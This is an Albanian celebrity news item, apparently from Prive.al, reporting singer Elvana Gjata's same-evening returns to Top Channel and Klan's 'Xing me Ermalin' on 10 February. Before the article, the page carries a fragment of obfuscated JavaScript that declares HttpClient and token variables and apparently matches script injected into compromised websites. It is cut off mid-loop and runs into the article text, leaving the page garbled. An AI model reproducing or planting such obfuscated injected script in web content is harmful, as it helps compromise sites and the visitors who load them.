;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Triku’ i Elvanës për balanc në rikthimin në ekran (VIDEO)

By

Ka mbi dy vite që i ka munguar në tërësi ekranit dhe paraqitjeve televizive.

Këngëtarja Elvana Gjata, e cila edhe para kapitullit të ri në jetë ka qenë ‘arrë e fortë’ për t’u siguruar në intervista nga gazetarët, në këto dy vjet është zhdukur tërësisht.

Por, me rikthimin që ka preferuar ta quajë ‘tek rrënjët’, bashkë po vijnë edhe rikthimet në ekran dhe për këtë pjesë, Elvana duket të ketë gjetur strategjinë më të duhur.

Këngëtarja, sipas të gjitha gjasave, në po të njejtën ditë do jetë në dy televizionet shqiptare, Top Channel dhe Klan, njëri pas tjetrit.

Dy ekranët që janë në një përballje të hapur për audiencë dhe personazhe nëpër emisione të ndryshme duket se me kompromis do e kenë Elvanën në dy forma.

Këngëtarja me 10 Shkurt në ora 20:05 ka paralajmëruar dokumentarin mbi koncertin privat në Top Channel teksa me të përfunduar ky emision special, në orën 21:00 sipas të gjitha gjasave do jetë në ‘Xing me Ermalin’, xhirimet e të cilit janë zhvilluar sot.

“3” EP

A post shared by Elvana Gjata (@elvanagjataaaa) on

Rikthim më korrekt për dyja palët që i ftoi edhe në koncert (Vjollca Hoxhën, Lorin e Sarën në njërën anë dhe Alba Frangajn në anën tjetër) s’do mund të kishte. /Prive.al/

Artikuj të ngjashëm